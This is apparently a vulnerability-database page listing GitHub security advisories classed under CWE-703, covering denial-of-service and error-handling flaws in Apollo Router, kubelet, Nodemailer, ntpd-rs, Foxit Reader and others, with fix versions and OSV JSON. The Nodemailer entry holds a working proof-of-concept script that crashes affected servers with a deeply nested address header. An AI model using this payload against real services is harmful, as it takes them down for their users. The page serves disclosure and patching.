CWE-703
DiscouragedImproper Check or Handling of Exceptional Conditions
Abstraction: Pillar · Status: Incomplete
The product does not properly anticipate or handle exceptional conditions that rarely occur during normal operation of the product.
212 vulnerabilities reference this CWE, most recent first.
GHSA-R344-XW3P-2FRJ
Vulnerability from github – Published: 2023-10-19 16:08 – Updated: 2023-10-19 16:08Impact
The Apollo Router is a configurable, high-performance graph router written in Rust to run a federated supergraph that uses Apollo Federation. Affected versions are subject to a Denial-of-Service (DoS) type vulnerability which causes the Router to panic and terminate when a multi-part response is sent. When users send queries to the router that uses the @defer or Subscriptions, the Router will panic.
To be vulnerable, users of Router must have a coprocessor with coprocessor.supergraph.response configured in their router.yaml and also to support either @defer or Subscriptions.
Patches
Router version 1.33.0 has a fix for this vulnerability. https://github.com/apollographql/router/pull/4014 fixes the issue.
Workarounds
For affected versions, avoid using the coprocessor supergraph response:
# do not use this stage in your coprocessor configuration
coprocessor:
supergraph:
response:
Or you can disable defer and subscriptions support:
# disable defer and subscriptions:
supergraph:
defer_support: false # enabled by default
subscription:
enabled: false # disabled by default
and continue to use the coprocessor supergraph response.
References
https://github.com/apollographql/router/issues/4013
{
"affected": [
{
"package": {
"ecosystem": "crates.io",
"name": "apollo-router"
},
"ranges": [
{
"events": [
{
"introduced": "1.31.0"
},
{
"fixed": "1.33.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-45812"
],
"database_specific": {
"cwe_ids": [
"CWE-703",
"CWE-754"
],
"github_reviewed": true,
"github_reviewed_at": "2023-10-19T16:08:10Z",
"nvd_published_at": "2023-10-18T22:15:09Z",
"severity": "HIGH"
},
"details": "### Impact\nThe Apollo Router is a configurable, high-performance graph router written in Rust to run a federated supergraph that uses Apollo Federation. Affected versions are subject to a Denial-of-Service (DoS) type vulnerability which causes the Router to panic and terminate when a multi-part response is sent. When users send queries to the router that uses the `@defer` or Subscriptions, the Router will panic.\n \nTo be vulnerable, users of Router must have a coprocessor with `coprocessor.supergraph.response` configured in their `router.yaml` and also to support either `@defer` or Subscriptions. \n\n### Patches\nRouter version 1.33.0 has a fix for this vulnerability. https://github.com/apollographql/router/pull/4014 fixes the issue. \n\n### Workarounds\nFor affected versions, avoid using the coprocessor supergraph response:\n```yml\n# do not use this stage in your coprocessor configuration\ncoprocessor:\n supergraph:\n response:\n``` \n\nOr you can disable defer and subscriptions support:\n```yml\n# disable defer and subscriptions:\nsupergraph:\n defer_support: false # enabled by default\nsubscription:\n enabled: false # disabled by default\n```\nand continue to use the coprocessor supergraph response.\n### References\nhttps://github.com/apollographql/router/issues/4013\n",
"id": "GHSA-r344-xw3p-2frj",
"modified": "2023-10-19T16:08:10Z",
"published": "2023-10-19T16:08:10Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/apollographql/router/security/advisories/GHSA-r344-xw3p-2frj"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45812"
},
{
"type": "WEB",
"url": "https://github.com/apollographql/router/issues/4013"
},
{
"type": "WEB",
"url": "https://github.com/apollographql/router/pull/4014"
},
{
"type": "WEB",
"url": "https://github.com/apollographql/router/commit/b917b8c117b46a2d508428c0856f4927dfcfc341"
},
{
"type": "PACKAGE",
"url": "https://github.com/apollographql/router"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Apollo Router vulnerable to Improper Check or Handling of Exceptional Conditions"
}
GHSA-R76G-G87F-VW8F
Vulnerability from github – Published: 2024-04-24 20:03 – Updated: 2024-06-10 19:33In kubelet v1.13.6 and v1.14.2, containers for pods that do not specify an explicit runAsUser attempt to run as uid 0 (root) on container restart, or if the image was previously pulled to the node. If the pod specified mustRunAsNonRoot: true, the kubelet will refuse to start the container as root. If the pod did not specify mustRunAsNonRoot: true, the kubelet will run the container as uid 0.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "k8s.io/kubernetes/cmd/kubelet"
},
"ranges": [
{
"events": [
{
"introduced": "1.14.0"
},
{
"fixed": "1.14.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "k8s.io/kubernetes/cmd/kubelet"
},
"ranges": [
{
"events": [
{
"introduced": "1.13.0"
},
{
"fixed": "1.13.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2019-11245"
],
"database_specific": {
"cwe_ids": [
"CWE-266",
"CWE-703"
],
"github_reviewed": true,
"github_reviewed_at": "2024-04-24T20:03:48Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "In kubelet v1.13.6 and v1.14.2, containers for pods that do not specify an explicit `runAsUser` attempt to run as uid 0 (root) on container restart, or if the image was previously pulled to the node. If the pod specified `mustRunAsNonRoot: true`, the kubelet will refuse to start the container as root. If the pod did not specify `mustRunAsNonRoot: true`, the kubelet will run the container as uid 0.",
"id": "GHSA-r76g-g87f-vw8f",
"modified": "2024-06-10T19:33:51Z",
"published": "2024-04-24T20:03:48Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-11245"
},
{
"type": "WEB",
"url": "https://github.com/kubernetes/kubernetes/issues/78308"
},
{
"type": "WEB",
"url": "https://github.com/kubernetes/kubernetes/pull/76665"
},
{
"type": "WEB",
"url": "https://github.com/kubernetes/kubernetes/pull/76665/commits/26e3c8674e66f0d10170d34f5445f0aed207387f"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1715726"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-r76g-g87f-vw8f"
},
{
"type": "PACKAGE",
"url": "https://github.com/kubernetes/kubernetes"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2024-2780"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20190919-0003"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
],
"summary": "Kubelet Incorrect Privilege Assignment"
}
GHSA-R786-G2J8-4P9W
Vulnerability from github – Published: 2024-08-02 06:30 – Updated: 2024-08-02 06:30CloudLink, versions 7.1.x and 8.x, contain an Improper check or handling of Exceptional Conditions Vulnerability in Cluster Component. A highly privileged malicious user with remote access could potentially exploit this vulnerability, leading to execute unauthorized actions and retrieve sensitive information from the database.
{
"affected": [],
"aliases": [
"CVE-2024-38482"
],
"database_specific": {
"cwe_ids": [
"CWE-703"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-08-02T04:17:27Z",
"severity": "MODERATE"
},
"details": "CloudLink, versions 7.1.x and 8.x, contain an Improper check or handling of Exceptional Conditions Vulnerability in Cluster Component. A highly privileged malicious user with remote access could potentially exploit this vulnerability, leading to execute unauthorized actions and retrieve sensitive information from the database.",
"id": "GHSA-r786-g2j8-4p9w",
"modified": "2024-08-02T06:30:56Z",
"published": "2024-08-02T06:30:56Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-38482"
},
{
"type": "WEB",
"url": "https://www.dell.com/support/kbdoc/en-us/000227493/dsa-2024-343-security-update-for-dell-cloudlink-vulnerability"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-RCMH-QJQH-P98V
Vulnerability from github – Published: 2025-12-01 20:44 – Updated: 2026-07-15 21:55Summary
A DoS can occur that immediately halts the system due to the use of an unsafe function.
Details
According to RFC 5322, nested group structures (a group inside another group) are not allowed. Therefore, in lib/addressparser/index.js, the email address parser performs flattening when nested groups appear, since such input is likely to be abnormal. (If the address is valid, it is added as-is.) In other words, the parser flattens all nested groups and inserts them into the final group list. However, the code implemented for this flattening process can be exploited by malicious input and triggers DoS
RFC 5322 uses a colon (:) to define a group, and commas (,) are used to separate members within a group. At the following location in lib/addressparser/index.js:
https://github.com/nodemailer/nodemailer/blob/master/lib/addressparser/index.js#L90
there is code that performs this flattening. The issue occurs when the email address parser attempts to process the following kind of malicious address header:
g0: g1: g2: g3: ... gN: victim@example.com;
Because no recursion depth limit is enforced, the parser repeatedly invokes itself in the pattern
addressparser → _handleAddress → addressparser → ...
for each nested group. As a result, when an attacker sends a header containing many colons, Nodemailer enters infinite recursion, eventually throwing Maximum call stack size exceeded and causing the process to terminate immediately. Due to the structure of this behavior, no authentication is required, and a single request is enough to shut down the service.
The problematic code section is as follows:
if (isGroup) {
...
if (data.group.length) {
let parsedGroup = addressparser(data.group.join(',')); // <- boom!
parsedGroup.forEach(member => {
if (member.group) {
groupMembers = groupMembers.concat(member.group);
} else {
groupMembers.push(member);
}
});
}
}
data.group is expected to contain members separated by commas, but in the attacker’s payload the group contains colon (:) tokens. Because of this, the parser repeatedly triggers recursive calls for each colon, proportional to their number.
PoC
const nodemailer = require('nodemailer');
function buildDeepGroup(depth) {
let parts = [];
for (let i = 0; i < depth; i++) {
parts.push(`g${i}:`);
}
return parts.join(' ') + ' user@example.com;';
}
const DEPTH = 3000; // <- control depth
const toHeader = buildDeepGroup(DEPTH);
console.log('to header length:', toHeader.length);
const transporter = nodemailer.createTransport({
streamTransport: true,
buffer: true,
newline: 'unix'
});
console.log('parsing start');
transporter.sendMail(
{
from: 'test@example.com',
to: toHeader,
subject: 'test',
text: 'test'
},
(err, info) => {
if (err) {
console.error('error:', err);
} else {
console.log('finished :', info && info.envelope);
}
}
);
As a result, when the colon is repeated beyond a certain threshold, the Node.js process terminates immediately.
Impact
The attacker can achieve the following:
- Force an immediate crash of any server/service that uses Nodemailer
- Kill the backend process with a single web request
- In environments using PM2/Forever, trigger a continuous restart loop, causing severe resource exhaustion”
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 7.0.10"
},
"package": {
"ecosystem": "npm",
"name": "nodemailer"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "7.0.11"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.webjars.npm:nodemailer"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"last_affected": "6.10.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-14874"
],
"database_specific": {
"cwe_ids": [
"CWE-703"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-01T20:44:25Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\nA DoS can occur that immediately halts the system due to the use of an unsafe function.\n\n### Details\nAccording to **RFC 5322**, nested group structures (a group inside another group) are not allowed. Therefore, in lib/addressparser/index.js, the email address parser performs flattening when nested groups appear, since such input is likely to be abnormal. (If the address is valid, it is added as-is.) In other words, the parser flattens all nested groups and inserts them into the final group list.\nHowever, the code implemented for this flattening process can be exploited by malicious input and triggers DoS\n\nRFC 5322 uses a colon (:) to define a group, and commas (,) are used to separate members within a group.\nAt the following location in lib/addressparser/index.js:\n\nhttps://github.com/nodemailer/nodemailer/blob/master/lib/addressparser/index.js#L90\n\nthere is code that performs this flattening. The issue occurs when the email address parser attempts to process the following kind of malicious address header:\n\n```g0: g1: g2: g3: ... gN: victim@example.com;```\n\nBecause no recursion depth limit is enforced, the parser repeatedly invokes itself in the pattern\n`addressparser \u2192 _handleAddress \u2192 addressparser \u2192 ...`\nfor each nested group. As a result, when an attacker sends a header containing many colons, Nodemailer enters infinite recursion, eventually throwing Maximum call stack size exceeded and causing the process to terminate immediately. Due to the structure of this behavior, no authentication is required, and a single request is enough to shut down the service.\n\nThe problematic code section is as follows:\n```js\nif (isGroup) {\n ...\n if (data.group.length) {\n let parsedGroup = addressparser(data.group.join(\u0027,\u0027)); // \u003c- boom!\n parsedGroup.forEach(member =\u003e {\n if (member.group) {\n groupMembers = groupMembers.concat(member.group);\n } else {\n groupMembers.push(member);\n }\n });\n }\n}\n```\n`data.group` is expected to contain members separated by commas, but in the attacker\u2019s payload the group contains colon `(:)` tokens. Because of this, the parser repeatedly triggers recursive calls for each colon, proportional to their number.\n\n### PoC\n\n```\nconst nodemailer = require(\u0027nodemailer\u0027);\n\nfunction buildDeepGroup(depth) {\n let parts = [];\n for (let i = 0; i \u003c depth; i++) {\n parts.push(`g${i}:`);\n }\n return parts.join(\u0027 \u0027) + \u0027 user@example.com;\u0027;\n}\n\nconst DEPTH = 3000; // \u003c- control depth \nconst toHeader = buildDeepGroup(DEPTH);\nconsole.log(\u0027to header length:\u0027, toHeader.length);\n\nconst transporter = nodemailer.createTransport({\n streamTransport: true,\n buffer: true,\n newline: \u0027unix\u0027\n});\n\nconsole.log(\u0027parsing start\u0027);\n\ntransporter.sendMail(\n {\n from: \u0027test@example.com\u0027,\n to: toHeader,\n subject: \u0027test\u0027,\n text: \u0027test\u0027\n },\n (err, info) =\u003e {\n if (err) {\n console.error(\u0027error:\u0027, err);\n } else {\n console.log(\u0027finished :\u0027, info \u0026\u0026 info.envelope);\n }\n }\n);\n```\nAs a result, when the colon is repeated beyond a certain threshold, the Node.js process terminates immediately.\n\n### Impact\nThe attacker can achieve the following:\n\n1. Force an immediate crash of any server/service that uses Nodemailer\n2. Kill the backend process with a single web request\n3. In environments using PM2/Forever, trigger a continuous restart loop, causing severe resource exhaustion\u201d",
"id": "GHSA-rcmh-qjqh-p98v",
"modified": "2026-07-15T21:55:30Z",
"published": "2025-12-01T20:44:25Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-rcmh-qjqh-p98v"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14874"
},
{
"type": "WEB",
"url": "https://github.com/nodemailer/nodemailer/commit/6218b8df"
},
{
"type": "WEB",
"url": "https://github.com/nodemailer/nodemailer/commit/b61b9c0cfd682b6f647754ca338373b68336a150"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2025-14874"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418133"
},
{
"type": "PACKAGE",
"url": "https://github.com/nodemailer/nodemailer"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Nodemailer\u2019s addressparser is vulnerable to DoS caused by recursive calls"
}
GHSA-RH4C-32WR-89CJ
Vulnerability from github – Published: 2023-08-31 00:30 – Updated: 2024-04-04 07:18An unhandled edge case in the component _sanitizedPath of ZipArchive v2.5.4 allows attackers to cause a Denial of Service (DoS) via a crafted zip file.
{
"affected": [],
"aliases": [
"CVE-2023-39136"
],
"database_specific": {
"cwe_ids": [
"CWE-703"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-08-30T22:15:08Z",
"severity": "MODERATE"
},
"details": "An unhandled edge case in the component _sanitizedPath of ZipArchive v2.5.4 allows attackers to cause a Denial of Service (DoS) via a crafted zip file.",
"id": "GHSA-rh4c-32wr-89cj",
"modified": "2024-04-04T07:18:15Z",
"published": "2023-08-31T00:30:17Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39136"
},
{
"type": "WEB",
"url": "https://github.com/ZipArchive/ZipArchive/issues/680"
},
{
"type": "WEB",
"url": "https://blog.ostorlab.co/zip-packages-exploitation.html"
},
{
"type": "WEB",
"url": "https://ostorlab.co/vulndb/advisory/OVE-2023-2"
},
{
"type": "WEB",
"url": "https://security.snyk.io/research/zip-slip-vulnerability"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-RPR6-4JJ7-QXHW
Vulnerability from github – Published: 2022-11-07 19:00 – Updated: 2022-11-10 12:01ELAN Miniport touchpad Windows driver before 24.21.51.2, as used in PC hardware from multiple manufacturers, allows local users to cause a system crash by sending a certain IOCTL request, because that request is handled twice.
{
"affected": [],
"aliases": [
"CVE-2021-42205"
],
"database_specific": {
"cwe_ids": [
"CWE-703"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-11-07T16:15:00Z",
"severity": "MODERATE"
},
"details": "ELAN Miniport touchpad Windows driver before 24.21.51.2, as used in PC hardware from multiple manufacturers, allows local users to cause a system crash by sending a certain IOCTL request, because that request is handled twice.",
"id": "GHSA-rpr6-4jj7-qxhw",
"modified": "2022-11-10T12:01:17Z",
"published": "2022-11-07T19:00:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-42205"
},
{
"type": "WEB",
"url": "https://www.emc.com.tw/upload/F2E/Vulnerability%20Report/Vulnerability%20Report_Miniport%20touchpad%20Windows%20driver_20221107.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-RR22-7M4R-XF6R
Vulnerability from github – Published: 2024-07-31 06:30 – Updated: 2025-03-27 18:30A vulnerability has been found in Dahua products. After obtaining the administrator's username and password, the attacker can send a carefully crafted data packet to the interface with vulnerabilities, causing the device to crash.
{
"affected": [],
"aliases": [
"CVE-2024-39945"
],
"database_specific": {
"cwe_ids": [
"CWE-703"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-07-31T04:15:03Z",
"severity": "MODERATE"
},
"details": "A vulnerability has been found in Dahua products.\u00a0\u00a0After\nobtaining the administrator\u0027s username and password, the attacker can send a\ncarefully crafted data packet to the interface with vulnerabilities, causing\nthe device to crash.",
"id": "GHSA-rr22-7m4r-xf6r",
"modified": "2025-03-27T18:30:42Z",
"published": "2024-07-31T06:30:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39945"
},
{
"type": "WEB",
"url": "https://www.dahuasecurity.com/aboutUs/trustedCenter/details/768"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-V5WW-RWW6-GQ76
Vulnerability from github – Published: 2025-11-11 18:30 – Updated: 2025-11-19 21:31Incorrect boundary conditions in the Graphics: WebGPU component. This vulnerability affects Firefox < 145.
{
"affected": [],
"aliases": [
"CVE-2025-13022"
],
"database_specific": {
"cwe_ids": [
"CWE-703"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-11-11T16:15:39Z",
"severity": "CRITICAL"
},
"details": "Incorrect boundary conditions in the Graphics: WebGPU component. This vulnerability affects Firefox \u003c 145.",
"id": "GHSA-v5ww-rww6-gq76",
"modified": "2025-11-19T21:31:17Z",
"published": "2025-11-11T18:30:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13022"
},
{
"type": "WEB",
"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1988488"
},
{
"type": "WEB",
"url": "https://www.mozilla.org/security/advisories/mfsa2025-87"
},
{
"type": "WEB",
"url": "https://www.mozilla.org/security/advisories/mfsa2025-90"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-V83Q-83HJ-RW38
Vulnerability from github – Published: 2025-02-28 17:46 – Updated: 2025-02-28 17:46Two denial of service vulnerabilities were found in ntpd-rs related to the handling of NTS cookies in our client functionality. Whenever an NTS source is configured and the server behind that source is sending zero-sized cookies or cookies larger than what would fit in our buffer size, ntpd-rs would crash. Only configured NTS sources can abuse these vulnerabilities. NTP sources or third parties that are not configured cannot make use of these vulnerabilities.
For zero-sized cookies: a division by zero would force an exit when the number of new cookies that would need to be requested is calculated. In ntpd-rs 1.5.0 a check was added to prevent the division by zero.
For large cookies: while trying to send a NTP request with the cookie included, the buffer is too small to handle the cookie and an exit of ntpd-rs is forced once a write to the buffer is attempted. The memory outside the buffer would not be written to in this case. In ntpd-rs 1.5.0 a check was added that prevents accepting cookies larger than 350 bytes.
Users of older versions of ntpd-rs are recommended to update to the latest version. If an update is impossible, it is recommended to only add NTS sources to ntpd-rs that are trusted to not abuse this bug.
{
"affected": [
{
"package": {
"ecosystem": "crates.io",
"name": "ntpd"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.5.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-369",
"CWE-703"
],
"github_reviewed": true,
"github_reviewed_at": "2025-02-28T17:46:36Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "Two denial of service vulnerabilities were found in ntpd-rs related to the handling of NTS cookies in our client functionality. Whenever an NTS source is configured and the server behind that source is sending zero-sized cookies or cookies larger than what would fit in our buffer size, ntpd-rs would crash. Only configured NTS sources can abuse these vulnerabilities. NTP sources or third parties that are not configured cannot make use of these vulnerabilities.\n\nFor zero-sized cookies: a division by zero would force an exit when the number of new cookies that would need to be requested is calculated. In ntpd-rs 1.5.0 a check was added to prevent the division by zero.\n\nFor large cookies: while trying to send a NTP request with the cookie included, the buffer is too small to handle the cookie and an exit of ntpd-rs is forced once a write to the buffer is attempted. The memory outside the buffer would not be written to in this case. In ntpd-rs 1.5.0 a check was added that prevents accepting cookies larger than 350 bytes.\n\nUsers of older versions of ntpd-rs are recommended to update to the latest version. If an update is impossible, it is recommended to only add NTS sources to ntpd-rs that are trusted to not abuse this bug.",
"id": "GHSA-v83q-83hj-rw38",
"modified": "2025-02-28T17:46:36Z",
"published": "2025-02-28T17:46:36Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pendulum-project/ntpd-rs/security/advisories/GHSA-v83q-83hj-rw38"
},
{
"type": "WEB",
"url": "https://github.com/pendulum-project/ntpd-rs/commit/10a103b471dae25ac598140df0c195b6531bf716"
},
{
"type": "WEB",
"url": "https://github.com/pendulum-project/ntpd-rs/commit/37dd8d9a0faa03e7dfe3a4bf64953010f075c3e2"
},
{
"type": "PACKAGE",
"url": "https://github.com/pendulum-project/ntpd-rs"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "ntpd NTS client denial of service via wrongly sized cookies"
}
GHSA-V8Q7-Q2CX-MH43
Vulnerability from github – Published: 2022-05-24 16:57 – Updated: 2024-04-04 02:08An exploitable memory corruption vulnerability exists in the JavaScript engine of Foxit Software's Foxit PDF Reader, version 9.4.1.16828. A specially crafted PDF document can trigger an out-of-memory condition which isn't handled properly, resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.
{
"affected": [],
"aliases": [
"CVE-2019-5031"
],
"database_specific": {
"cwe_ids": [
"CWE-703",
"CWE-755",
"CWE-770"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-10-02T16:15:00Z",
"severity": "HIGH"
},
"details": "An exploitable memory corruption vulnerability exists in the JavaScript engine of Foxit Software\u0027s Foxit PDF Reader, version 9.4.1.16828. A specially crafted PDF document can trigger an out-of-memory condition which isn\u0027t handled properly, resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.",
"id": "GHSA-v8q7-q2cx-mh43",
"modified": "2024-04-04T02:08:08Z",
"published": "2022-05-24T16:57:43Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-5031"
},
{
"type": "WEB",
"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2019-0793"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
No mitigation information available for this CWE.
No CAPEC attack patterns related to this CWE.